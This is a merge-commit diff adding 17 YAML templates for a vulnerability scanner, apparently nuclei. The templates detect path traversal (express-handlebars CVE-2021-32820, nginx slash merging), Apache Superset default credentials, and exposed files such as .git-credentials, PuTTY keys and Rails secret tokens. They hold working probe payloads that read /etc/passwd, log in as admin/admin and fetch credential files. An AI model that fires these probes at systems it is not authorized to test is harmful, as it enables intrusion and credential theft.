Merge pull request #2125 from DhiyaneshGeek/master

17 New Templates Added
2021-07-24 03:26:09 +05:30 · 2021-07-24 03:26:09 +05:30 · 4b444af3c4
parent f0ae660728 9617bc5815
commit 4b444af3c4
17 changed files with 533 additions and 0 deletions
--- a/cves/2021/CVE-2021-32820.yaml
+++ b/cves/2021/CVE-2021-32820.yaml
@ -0,0 +1,29 @@
+id: CVE-2021-32820
+
+info:
+  name: Express-handlebars Path Traversal
+  author: dhiyaneshDk
+  severity: medium
+  reference: |
+        - https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/
+        - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json
+  tags: cve,cve2021,expressjs,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?layout=/etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0:"
+          - "daemon:[x*]:0:0:"
+          - "operator:[x*]:0:0:"
+        part: body
+        condition: or
--- a/default-logins/apache/apache-superset-default-credentials.yaml
+++ b/default-logins/apache/apache-superset-default-credentials.yaml
@ -0,0 +1,61 @@
+id: apache-superset-default-credentials
+
+info:
+  name: Apache Superset Default Credentials
+  author: dhiyaneshDK
+  severity: high
+  reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json
+  tags: apache, default-login
+
+requests:
+  - raw:
+      - |
+        GET /login/ HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{BaseURL}}
+        Connection: close
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+        Accept-Language: en-US,en;q=0.9
+
+      - |
+        POST /login/ HTTP/1.1
+        Host: {{Hostname}}
+        Content-Length: 152
+        Cache-Control: max-age=0
+        Origin: {{BaseURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Referer: {{BaseURL}}/admin/airflow/login
+        Accept-Encoding: gzip, deflate
+        Accept-Language: en-IN,en;q=0.9
+        Connection: close
+
+        csrf_token={{csrff_token}}&username=admin&password=admin
+
+    extractors:
+      - type: regex
+        name: csrff_token
+        group: 1
+        part: body
+        internal: true
+        regex:
+          - 'value="(.*?)">'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        condition: and
+        words:
+          - '<title>Redirecting...</title>'
+          - '<h1>Redirecting...</h1'
+          - '<a href="/">'
+
+      - type: word
+        part: header
+        words:
+          - 'session'
+
+      - type: status
+        status:
+          - 302
--- a/exposures/configs/appsec-yml-disclosure.yaml
+++ b/exposures/configs/appsec-yml-disclosure.yaml
@ -0,0 +1,28 @@
+id: appsec-yml-disclosure
+
+info:
+  name: Appsec Yml Disclosure
+  author: dhiyaneshDk
+  severity: medium
+  reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/appsec-yml-disclosure.json
+  tags: exposure,config
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/appspec.yml"
+      - "{{BaseURL}}/appspec.yaml"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "version:"
+          - "os:"
+          - "files:"
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200
--- a/exposures/configs/dockerfile-hidden-disclosure.yaml
+++ b/exposures/configs/dockerfile-hidden-disclosure.yaml
@ -0,0 +1,31 @@
+id: dockerfile-hidden-disclosure
+
+info:
+  name: Dockerfile Hidden Disclosure
+  author: dhiyaneshDk
+  severity: medium
+  reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/dockerfile-hidden-disclosure.json
+  tags: exposure,config
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/.dockerfile"
+      - "{{BaseURL}}/.Dockerfile"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - '^(?:FROM(?:CACHE)?|RUN|ADD|WORKDIR|ENV|EXPOSE|\#)\s+[ -~]+'
+        part: body
+
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+        negative: true
--- a/exposures/configs/git-credentials-disclosure.yaml
+++ b/exposures/configs/git-credentials-disclosure.yaml
@ -0,0 +1,32 @@
+id: git-credentials-disclosure
+
+info:
+  name: Git Credentials Disclosure
+  author: dhiyaneshDk
+  severity: medium
+  reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/git-credentials-disclosure.json
+  tags: exposure,config
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/.git-credentials"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "https://"
+          - "@github.com"
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+        negative: true
--- a/exposures/configs/github-workflows-disclosure.yaml
+++ b/exposures/configs/github-workflows-disclosure.yaml
@ -0,0 +1,48 @@
+id: github-workflows-disclosure
+
+info:
+  name: Github Workflow Disclosure
+  author: dhiyaneshDk
+  severity: medium
+  reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/github-workflows-disclosure.json
+  tags: exposure,config
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/.github/workflows/ci.yml"
+      - "{{BaseURL}}/.github/workflows/ci.yaml"
+      - "{{BaseURL}}/.github/workflows/CI.yml"
+      - "{{BaseURL}}/.github/workflows/main.yml"
+      - "{{BaseURL}}/.github/workflows/main.yaml"
+      - "{{BaseURL}}/.github/workflows/build.yml"
+      - "{{BaseURL}}/.github/workflows/build.yaml"
+      - "{{BaseURL}}/.github/workflows/test.yml"
+      - "{{BaseURL}}/.github/workflows/test.yaml"
+      - "{{BaseURL}}/.github/workflows/tests.yml"
+      - "{{BaseURL}}/.github/workflows/tests.yaml"
+      - "{{BaseURL}}/.github/workflows/release.yml"
+      - "{{BaseURL}}/.github/workflows/publish.yml"
+      - "{{BaseURL}}/.github/workflows/deploy.yml"
+      - "{{BaseURL}}/.github/workflows/push.yml"
+      - "{{BaseURL}}/.github/workflows/lint.yml"
+      - "{{BaseURL}}/.github/workflows/coverage.yml"
+      - "{{BaseURL}}/.github/workflows/release.yaml"
+      - "{{BaseURL}}/.github/workflows/pr.yml"
+      - "{{BaseURL}}/.github/workflows/automerge.yml"
+      - "{{BaseURL}}/.github/workflows/docker.yml"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "(?m)^\\s*\"?on\"?:"
+          - "(?m)^\\s*\"?jobs\"?:"
+          - "(?m)^\\s*\"?steps\"?:"
+          - "(?m)^\\s*- \"?uses\"?:"
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200
--- a/exposures/configs/hp-ilo-serial-key-disclosure.yaml
+++ b/exposures/configs/hp-ilo-serial-key-disclosure.yaml
@ -0,0 +1,27 @@
+id: hp-ilo-serial-key-disclosure
+
+info:
+  name: HP ILO Serial Key Disclosure
+  author: dhiyaneshDk
+  severity: medium
+  reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/hp-ilo-serial-key-disclosure.json
+  tags: exposure,config
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/xmldata?item=CpqKey"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "LTYPE"
+          - "LNAME"
+          - "KEY"
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200
--- a/exposures/configs/kubernetes-kustomization-disclosure.yaml
+++ b/exposures/configs/kubernetes-kustomization-disclosure.yaml
@ -0,0 +1,36 @@
+id: kubernetes-kustomization-disclosure
+
+info:
+  name: Kubernetes Kustomization Disclosure
+  author: dhiyaneshDk
+  severity: medium
+  reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/kubernetes-kustomization-disclosure.json
+  tags: exposure,config
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/kustomization.yml"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        condition: or
+        words:
+          - "apiVersion:"
+          - "resources:"
+          - "namespace:"
+          - "commonLabels:"
+          - "Kustomization"
+
+      - type: word
+        part: body
+        condition: or
+        words:
+          - "yaml"
+          - "yml"
+
+      - type: status
+        status:
+          - 200
--- a/exposures/files/php-user-ini-disclosure.yaml
+++ b/exposures/files/php-user-ini-disclosure.yaml
@ -0,0 +1,31 @@
+id: php-user-ini-disclosure
+
+info:
+  name: Php User.ini Disclosure
+  author: dhiyaneshDk
+  severity: medium
+  reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/php-user-ini-disclosure.json
+  tags: exposure,config
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/user.ini"
+      - "{{BaseURL}}/.user.ini"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "assert"
+          - "highlight"
+          - "opcache"
+          - "mssql"
+          - "oci8"
+          - "agent"
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200
--- a/exposures/files/putty-private-key-disclosure.yaml
+++ b/exposures/files/putty-private-key-disclosure.yaml
@ -0,0 +1,26 @@
+id: putty-private-key-disclosure
+
+info:
+  name: Putty Private Key Disclosure
+  author: dhiyaneshDk
+  severity: medium
+  reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/putty-private-key-disclosure.json
+  tags: exposure,files
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/my.ppk"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "PuTTY-User-Key-File"
+          - "Encryption:"
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200
--- a/exposures/files/pyproject-disclosure.yaml
+++ b/exposures/files/pyproject-disclosure.yaml
@ -0,0 +1,26 @@
+id: pyproject-disclosure
+
+info:
+  name: Pyproject Disclosure
+  author: dhiyaneshDk
+  severity: info
+  reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/pyproject-disclosure.json
+  tags: exposure,files
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/pyproject.toml"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "[build-system]"
+          - "[tool.poetry]"
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200
--- a/exposures/files/ruby-on-rails-secret-token-disclosure.yaml
+++ b/exposures/files/ruby-on-rails-secret-token-disclosure.yaml
@ -0,0 +1,25 @@
+id: ruby-on-rails-secret-token-disclosure
+
+info:
+  name: Ruby on Rails Secret Token Disclosure
+  author: dhiyaneshDk
+  severity: medium
+  reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/ruby-on-rails-secret-token-disclosure.json
+  tags: exposure,files
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/config/initializers/secret_token.rb"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "secret_key_base ="
+          - "config.secret_token ="
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200
--- a/exposures/files/snyk-ignore-file-disclosure.yaml
+++ b/exposures/files/snyk-ignore-file-disclosure.yaml
@ -0,0 +1,24 @@
+id: snyk-ignore-file-disclosure
+
+info:
+  name: Snyk Ignore File Disclosure
+  author: dhiyaneshDk
+  severity: info
+  reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/snyk-ignore-file-disclosure.json
+  tags: exposure,files
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/.snyk"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities."
+        part: body
+
+      - type: status
+        status:
+          - 200
--- a/exposures/files/thumbs-db-disclosure.yaml
+++ b/exposures/files/thumbs-db-disclosure.yaml
@ -0,0 +1,23 @@
+id: thumbs-db-disclosure
+
+info:
+  name: Thumbs DB Disclosure
+  author: dhiyaneshDk
+  severity: info
+  reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/thumbs-db-disclosure.json
+  tags: exposure,files
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/Thumbs.db"
+    matchers-condition: and
+    matchers:
+      - type: binary
+        binary:
+          - 'D0CF11E0A1B11AE1'
+        part: body
+
+      - type: status
+        status:
+          - 200
--- a/exposures/logs/roundcube-log-disclosure.yaml
+++ b/exposures/logs/roundcube-log-disclosure.yaml
@ -0,0 +1,25 @@
+id: roundcube-log-disclosure
+
+info:
+  name: Roundcube Log Disclosure
+  author: dhiyaneshDk
+  severity: low
+  reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/roundcube-log-disclosure.json
+  tags: exposure,logs
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/roundcube/logs/sendmail"
+      - "{{BaseURL}}/roundcube/logs/errors.log"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "IMAP Error:"
+        part: body
+
+      - type: status
+        status:
+          - 200
--- a/misconfiguration/clockwork-dashboard-exposure.yaml
+++ b/misconfiguration/clockwork-dashboard-exposure.yaml
@ -0,0 +1,30 @@
+id: clockwork-dashboard-exposure
+
+info:
+  name: Clockwork Dashboard Exposure
+  author: dhiyaneshDk
+  severity: high
+  reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/clockwork-dashboard-exposure.json
+  tags: exposure,unauth
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/__clockwork/latest"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '"id":'
+          - '"version":'
+          - '"method":'
+          - '"url":'
+          - '"time":'
+        part: body
+        condition: and
+
+      - type: word
+        words:
+          - "application/json"
+        part: header
--- a/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml
+++ b/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml
@ -0,0 +1,31 @@
+id: nginx-merge-slashes-path-traversal
+
+info:
+  name: Nginx Merge Slashes Path Traversal
+  author: dhiyaneshDk
+  severity: medium
+  reference: |
+        - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/nginx-merge-slashes-path-traversal.json
+        - https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d
+  tags: exposure,config,lfi,nginx
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}///////../../../etc/passwd"
+      - "{{BaseURL}}/static///////../../../../etc/passwd"
+      - "{{BaseURL}}///../app.js"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0:"
+          - "app.listen"
+        part: body
+        condition: or
+
+      - type: status
+        status:
+          - 200